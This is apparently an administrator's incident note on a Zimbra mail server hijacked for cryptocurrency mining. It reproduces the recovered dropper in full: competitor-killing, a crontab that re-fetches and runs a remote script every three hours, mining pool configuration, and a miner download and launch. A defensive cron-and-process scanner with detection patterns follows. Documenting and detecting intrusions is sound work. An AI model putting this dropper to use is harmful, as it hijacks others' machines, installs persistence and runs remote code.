[Notes] Zimbra host seems to have been hijacked for mining
Recently I found that the Zimbra host seems to have been broken into by an attacker.
There were records of root sending mail outward, so I set always_bcc in Zimbra's postfix to see what was actually being sent.
It appears to be sent periodically via crontab, but I checked all the crontabs under /etc and did not see anything unusual..
The mail content is as follows:

> 3:00 (5 hours ago)
>
> ('
>
> /bin/sh: -c: line 0:/bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh'
It fetches a file on its own and disguises it as a Zimbra system file, but that file link seems to have expired already and can no longer be downloaded.
The content of the downloaded file is as follows:

```bash
#!/bin/bash

# Kill competing miners and scanners so this one gets the CPU to itself.
kill -9 $(ps aux | grep "-B -o stratum" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "minerd" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "-B -c /" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "stratum" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "java" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "ssh-scan" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "/bin/sh ./start" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "zimbravm-cache" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "/bin/bash ./a" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "pscan" | awk '{print $2}') 2>&1

ARCH=$(uname -m)
BINNAME="zm-helper"
BINCFG="zm-helper.cfg"

# Install location depends on privilege: /sbin and /etc as root, /tmp otherwise.
if [[ $EUID -eq 0 ]]
then
    BINDIR="/sbin/"
    CFGDIR="/etc/"
    BINPATH="$BINDIR$BINNAME"
    CFGPATH="$CFGDIR$BINCFG"
fi
if [[ $EUID -ne 0 ]]
then
    BINDIR="/tmp/"
    CFGDIR="/tmp/"
    BINPATH="$BINDIR$BINNAME"
    CFGPATH="$CFGDIR$BINCFG"
fi

# Persistence: wipe the current user's crontab and reinstall a job every 3 hours
# that re-downloads and re-runs this script.
if [ -f /opt/zimbra/data/tmp/.z.sh ]
then
    crontab -r
    wget -q https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT -O /opt/zimbra/data/tmp/.z.sh
    cro='/bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh'
    (crontab -l; echo "0 */3 * * * $cro") 2>&1 | sed "s/no crontab for $(whoami)//" | uniq | crontab -
fi

# Stop any previous instance of the miner, then replace binary and config.
k=$(ps aux | grep "[${BINNAME:0:1}]mod -B -c ${CFGPATH:0:4}" | awk '{print $2}')
if [ ! -z "$k" ]
then
    kill -9 $(ps aux | grep "[${BINNAME:0:1}]mod -B -c ${CFGPATH:0:4}" | awk '{print $2}')
fi
[[ -f "$CFGPATH" ]] && rm -rf "$CFGPATH"
[[ -f "$BINPATH" ]] && rm -rf "$BINPATH"

# Write the mining pool configuration.
(cat <<- EOF
{
"url" : "stratum+tcp://ltc.give-me-coins.com:3333",
"user" : "n0ts0me1ne.1",
"pass" : "zx1",
"quiet" : true
}
EOF
) > "$CFGPATH"

# Fetch the architecture-specific miner binary and start it in the background.
wget -q https://cp1.awardspace.net/filemanager2/core/doc/.mz/m_`uname -m` -O "$BINPATH"
chmod +x "$BINPATH"
eval "$BINPATH -B -c $CFGPATH 2> /dev/null"

# Print the miner's PID if it is running.
chk=$(ps aux | grep "[${BINNAME:0:1}]mod" | awk '{print $2}')
if [ ! -z "$chk" ]
then
    echo "$chk"
fi
exit 1
```

First back up and then delete any similar files, then run

> /opt/zimbra/libexec/zmfixperms --verbose --extended

to fix the permission problems.
That's about it for now; I'll reinstall it another day.
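A triage helper added to this note (not the author's code and not part of the dropper) for the pattern described above: the dropper installs its job with `crontab -`, which lands in the per-user cron spool rather than under /etc, so the checks below walk the per-user crontabs for curl/wget-to-shell entries, look for the paths the script writes, and look for a process started as `zm-helper -B -c <cfg>`. It assumes per-user crontabs live under /var/spool/cron or /var/spool/cron/crontabs (distribution dependent); the sample inputs in the comments are constructed.

```shell
# Triage helper added to this note (not the author's code and not from the
# dropper). Assumption: per-user crontabs live under /var/spool/cron or
# /var/spool/cron/crontabs (distribution dependent).

# Cron lines shaped like: /bin/bash <(curl -ksL URL); /opt/zimbra/data/tmp/.z.sh
CRON_RE='<\((curl|wget)|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|/opt/zimbra/data/tmp/\.z\.sh'
# Process-list lines for the renamed miner, a stratum pool URL, or minerd.
PS_RE='zm-helper[[:space:]]+-B[[:space:]]+-c|stratum[+]tcp://|minerd'
# Paths written by the root branch and the non-root branch of the dropper.
DROP_PATHS='/opt/zimbra/data/tmp/.z.sh /sbin/zm-helper /etc/zm-helper.cfg /tmp/zm-helper /tmp/zm-helper.cfg'

# Read text on stdin, print non-comment lines matching $1; status 1 on hits.
match_lines() {
    local hits
    hits=$(grep -Ev '^[[:space:]]*#' | grep -E "$1") || true
    [ -n "$hits" ] || return 0
    printf '%s\n' "$hits"
    return 1
}

# Feed a crontab (e.g. the output of `crontab -l -u zimbra`) on stdin.
scan_crontab_text() { match_lines "$CRON_RE"; }
# Feed a process listing on stdin; drops the grep processes of this pipeline.
scan_ps_text()      { grep -v grep | match_lines "$PS_RE"; }

# Walk every per-user crontab (checking only /etc misses `crontab -` entries),
# then the drop paths, then the live process list. Status 1 if anything hit.
scan_host() {
    local f p rc=0
    for f in /var/spool/cron/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] && [ -r "$f" ] || continue
        scan_crontab_text < "$f" >/dev/null || { echo "suspicious cron: $f"; rc=1; }
    done
    for p in $DROP_PATHS; do
        [ -e "$p" ] && { echo "artifact present: $p"; rc=1; }
    done
    ps axo pid,user,args | scan_ps_text || rc=1
    return $rc
}
```

Run `scan_host` as root so the cron spool is readable; a clean host exits 0 and prints nothing.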
